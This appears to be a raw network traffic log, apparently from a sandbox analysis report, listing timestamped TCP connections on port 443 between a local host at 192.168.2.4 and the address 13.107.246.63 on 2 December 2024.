                                                          Dec 2, 2024 17:57:25.974240065 CET49951443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:25.974253893 CET4434995113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:26.036514997 CET49946443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:26.036545992 CET4434994613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:26.218970060 CET4434994713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:26.222078085 CET4434994713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:26.222188950 CET49947443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:26.222378016 CET49947443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:26.222392082 CET4434994713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:26.228298903 CET49952443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:26.228354931 CET4434995213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:26.228494883 CET49952443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:26.228852987 CET49952443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:26.228873968 CET4434995213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:26.879851103 CET4434994813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:26.880753040 CET49948443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:26.880785942 CET4434994813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:26.882137060 CET49948443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:26.882143974 CET4434994813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:27.150680065 CET4434994913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:27.154134035 CET49949443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:27.154161930 CET4434994913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:27.154692888 CET49949443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:27.154699087 CET4434994913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:27.324351072 CET4434994813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:27.327442884 CET4434994813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:27.327563047 CET49948443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:27.327661991 CET49948443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:27.327682018 CET4434994813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:27.327708006 CET49948443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:27.327713966 CET4434994813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:27.334753036 CET49953443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:27.334788084 CET4434995313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:27.334933043 CET49953443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:27.335325956 CET49953443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:27.335335970 CET4434995313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:27.539895058 CET4434995013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:27.540421963 CET49950443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:27.540445089 CET4434995013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:27.540893078 CET49950443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:27.540899038 CET4434995013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:27.586841106 CET4434994913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:27.586909056 CET4434994913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:27.586997032 CET49949443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:27.587189913 CET49949443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:27.587204933 CET4434994913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:27.587246895 CET49949443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:27.587250948 CET4434994913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:27.589833021 CET49954443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:27.589874983 CET4434995413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:27.589951992 CET49954443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:27.590091944 CET49954443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:27.590105057 CET4434995413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:27.759812117 CET4434995113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:27.760180950 CET49951443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:27.760207891 CET4434995113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:27.760556936 CET49951443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:27.760562897 CET4434995113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:27.997229099 CET4434995013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:27.997317076 CET4434995013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:27.997374058 CET49950443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:27.997562885 CET49950443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:27.997581959 CET4434995013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:27.997596025 CET49950443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:27.997601986 CET4434995013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:28.000416040 CET49955443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:28.000451088 CET4434995513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:28.000546932 CET49955443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:28.000726938 CET49955443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:28.000741959 CET4434995513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:28.078984022 CET4434995213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:28.079432964 CET49952443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:28.079458952 CET4434995213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:28.079853058 CET49952443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:28.079858065 CET4434995213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:28.236792088 CET4434995113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:28.236818075 CET4434995113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:28.236864090 CET4434995113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:28.236989021 CET49951443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:28.237217903 CET49951443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:28.237236023 CET4434995113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:28.237247944 CET49951443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:28.237253904 CET4434995113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:28.240036964 CET49956443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:28.240076065 CET4434995613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:28.240163088 CET49956443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:28.240336895 CET49956443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:28.240351915 CET4434995613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:28.539339066 CET4434995213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:28.539426088 CET4434995213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:28.539509058 CET49952443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:28.539762974 CET49952443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:28.539781094 CET4434995213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:28.539830923 CET49952443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:28.539836884 CET4434995213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:28.546422958 CET49957443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:28.546466112 CET4434995713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:28.546628952 CET49957443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:28.547035933 CET49957443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:28.547050953 CET4434995713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:29.207063913 CET4434995313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:29.207642078 CET49953443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:29.207659006 CET4434995313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:29.208096027 CET49953443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:29.208101034 CET4434995313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:29.382365942 CET4434995413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:29.383246899 CET49954443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:29.383282900 CET4434995413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:29.383672953 CET49954443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:29.383678913 CET4434995413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:29.680643082 CET4434995313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:29.680680037 CET4434995313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:29.680742025 CET4434995313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:29.680766106 CET49953443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:29.680794954 CET49953443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:29.681063890 CET49953443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:29.681085110 CET4434995313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:29.681097984 CET49953443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:29.681102991 CET4434995313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:29.685733080 CET49958443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:29.685781002 CET4434995813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:29.685872078 CET49958443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:29.686034918 CET49958443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:29.686049938 CET4434995813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:29.737587929 CET4434995513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:29.738040924 CET49955443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:29.738058090 CET4434995513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:29.738466978 CET49955443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:29.738473892 CET4434995513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:29.828077078 CET4434995413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:29.830996990 CET4434995413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:29.831082106 CET49954443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:29.831120014 CET49954443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:29.831120014 CET49954443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:29.831141949 CET4434995413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:29.831151009 CET4434995413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:29.833643913 CET49959443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:29.833693981 CET4434995913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:29.833765030 CET49959443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:29.833873034 CET49959443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:29.833889008 CET4434995913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:30.023555994 CET4434995613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:30.024059057 CET49956443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:30.024091959 CET4434995613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:30.024502039 CET49956443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:30.024508953 CET4434995613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:30.172367096 CET4434995513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:30.177297115 CET4434995513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:30.177345991 CET49955443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:30.177352905 CET4434995513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:30.177405119 CET49955443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:30.177448988 CET49955443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:30.177467108 CET4434995513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:30.177486897 CET49955443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:30.177493095 CET4434995513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:30.180026054 CET49960443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:30.180068970 CET4434996013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:30.180136919 CET49960443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:30.180272102 CET49960443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:30.180288076 CET4434996013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:30.394817114 CET4434995713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:30.395358086 CET49957443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:30.395397902 CET4434995713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:30.395991087 CET49957443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:30.395997047 CET4434995713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:30.475466013 CET4434995613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:30.478564978 CET4434995613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:30.478638887 CET49956443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:30.478682995 CET49956443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:30.478708982 CET4434995613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:30.478719950 CET49956443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:30.478727102 CET4434995613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:30.481779099 CET49961443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:30.481822968 CET4434996113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:30.481889009 CET49961443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:30.482033968 CET49961443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:30.482053995 CET4434996113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:30.853403091 CET4434995713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:30.856384039 CET4434995713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:30.856443882 CET4434995713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:30.856446028 CET49957443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:30.856494904 CET49957443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:30.856542110 CET49957443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:30.856560946 CET4434995713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:30.856571913 CET49957443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:30.856578112 CET4434995713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:30.859307051 CET49962443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:30.859366894 CET4434996213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:30.859447002 CET49962443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:30.859616041 CET49962443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:30.859631062 CET4434996213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:31.466766119 CET4434995813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:31.467333078 CET49958443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:31.467364073 CET4434995813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:31.467811108 CET49958443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:31.467817068 CET4434995813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:31.550589085 CET4434995913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:31.551153898 CET49959443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:31.551179886 CET4434995913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:31.551588058 CET49959443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:31.551593065 CET4434995913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:31.912360907 CET4434995813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:31.915281057 CET4434995813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:31.915376902 CET49958443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:31.915405989 CET49958443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:31.915427923 CET4434995813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:31.915441036 CET49958443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:31.915446043 CET4434995813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:31.918051004 CET49963443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:31.918096066 CET4434996313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:31.918185949 CET49963443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:31.918318987 CET49963443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:31.918339968 CET4434996313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:31.996237993 CET4434995913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:31.996257067 CET4434995913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:31.996326923 CET49959443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:31.996329069 CET4434995913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:31.996371031 CET49959443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:31.996552944 CET49959443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:31.996572971 CET4434995913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:31.996582985 CET49959443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:31.996588945 CET4434995913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:31.999216080 CET49964443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:31.999267101 CET4434996413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:31.999356031 CET49964443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:31.999527931 CET49964443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:31.999541998 CET4434996413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:32.028213024 CET4434996013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:32.028589964 CET49960443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:32.028610945 CET4434996013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:32.029032946 CET49960443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:32.029037952 CET4434996013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:32.330753088 CET4434996113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:32.331597090 CET49961443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:32.331614017 CET4434996113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:32.332082987 CET49961443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:32.332087994 CET4434996113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:32.482672930 CET4434996013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:32.482693911 CET4434996013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:32.482750893 CET49960443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:32.482774973 CET4434996013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:32.482953072 CET49960443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:32.482963085 CET4434996013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:32.482970953 CET49960443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:32.483113050 CET4434996013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:32.483148098 CET4434996013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:32.483187914 CET49960443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:32.485747099 CET49965443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:32.485788107 CET4434996513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:32.485863924 CET49965443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:32.486001015 CET49965443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:32.486011982 CET4434996513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:32.642376900 CET4434996213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:32.643217087 CET49962443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:32.643234968 CET4434996213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:32.643826008 CET49962443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:32.643832922 CET4434996213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:32.784845114 CET4434996113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:32.787877083 CET4434996113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:32.787921906 CET49961443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:32.787931919 CET4434996113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:32.787986040 CET49961443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:32.788032055 CET49961443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:32.788049936 CET4434996113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:32.788062096 CET49961443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:32.788067102 CET4434996113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:32.790796041 CET49966443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:32.790832043 CET4434996613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:32.790883064 CET49966443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:32.791038990 CET49966443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:32.791053057 CET4434996613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:33.087624073 CET4434996213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:33.090614080 CET4434996213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:33.090682983 CET49962443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:33.090707064 CET49962443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:33.090728998 CET4434996213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:33.090739012 CET49962443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:33.090744019 CET4434996213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:33.093544006 CET49967443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:33.093578100 CET4434996713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:33.093647957 CET49967443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:33.093795061 CET49967443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:33.093810081 CET4434996713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:33.699435949 CET4434996313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:33.700474024 CET49963443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:33.700474024 CET49963443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:33.700500011 CET4434996313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:33.700519085 CET4434996313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:33.715269089 CET4434996413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:33.715862989 CET49964443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:33.715898991 CET4434996413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:33.715986967 CET49964443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:33.715991974 CET4434996413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:34.144857883 CET4434996313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:34.147866964 CET4434996313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:34.147919893 CET4434996313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:34.147963047 CET49963443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:34.148031950 CET49963443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:34.148031950 CET49963443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:34.150671959 CET49968443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:34.150671959 CET49963443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:34.150700092 CET4434996813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:34.150712967 CET4434996313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:34.150952101 CET49968443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:34.150952101 CET49968443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:34.150975943 CET4434996813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:34.153532982 CET4434996413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:34.159169912 CET4434996413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:34.159240961 CET49964443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:34.159240961 CET49964443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:34.159857988 CET49964443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:34.159874916 CET4434996413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:34.161235094 CET49969443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:34.161273003 CET4434996913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:34.161448956 CET49969443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:34.161448956 CET49969443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:34.161490917 CET4434996913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:34.202888012 CET4434996513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:34.203598976 CET49965443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:34.203625917 CET4434996513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:34.203735113 CET49965443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:34.203739882 CET4434996513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:34.534975052 CET4434996613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:34.535491943 CET49966443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:34.535531044 CET4434996613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:34.535954952 CET49966443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:34.535959959 CET4434996613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:34.638237000 CET4434996513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:34.641680956 CET4434996513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:34.641722918 CET4434996513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:34.641745090 CET49965443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:34.641784906 CET49965443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:34.641827106 CET49965443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:34.641848087 CET4434996513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:34.641863108 CET49965443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:34.641869068 CET4434996513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:34.644504070 CET49970443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:34.644540071 CET4434997013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:34.644644022 CET49970443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:34.644787073 CET49970443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:34.644802094 CET4434997013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:34.942243099 CET4434996713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:57:34.942804098 CET49967443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:57:34.942837000 CET4434996713.107.246.63192.168.2.4
